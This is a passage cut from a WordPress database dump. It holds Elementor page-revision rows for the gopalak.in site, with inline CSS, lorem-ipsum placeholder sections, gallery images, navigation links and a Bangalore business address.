.elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-07 10:32:43','2022-10-07 05:02:43','',1373,'https://gopalak.in/?p=1540',0,'revision','',0),(1541,1,'2022-10-07 10:32:43','2022-10-07 05:02:43','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-07 10:32:43','2022-10-07 05:02:43','',1373,'https://gopalak.in/?p=1541',0,'revision','',0),(1543,1,'2022-10-07 12:13:24','2022-10-07 06:43:24','','Group 122','','inherit','open','closed','','group-122','','','2022-10-07 12:13:24','2022-10-07 06:43:24','',1373,'https://gopalak.in/wp-content/uploads/2022/10/Group-122.png',0,'attachment','image/png',0),(1544,1,'2022-10-10 15:25:57','2022-10-10 09:55:57','','gopalak B1 copy','','inherit','open','closed','','gopalak-b1-copy','','','2022-10-10 15:25:57','2022-10-10 09:55:57','',1373,'https://gopalak.in/wp-content/uploads/2022/10/gopalak-B1-copy.jpg',0,'attachment','image/jpeg',0),(1545,1,'2022-10-10 15:27:14','2022-10-10 09:57:14','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 15:27:14','2022-10-10 09:57:14','',1373,'https://gopalak.in/?p=1545',0,'revision','',0),(1546,1,'2022-10-10 15:27:14','2022-10-10 09:57:14','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, 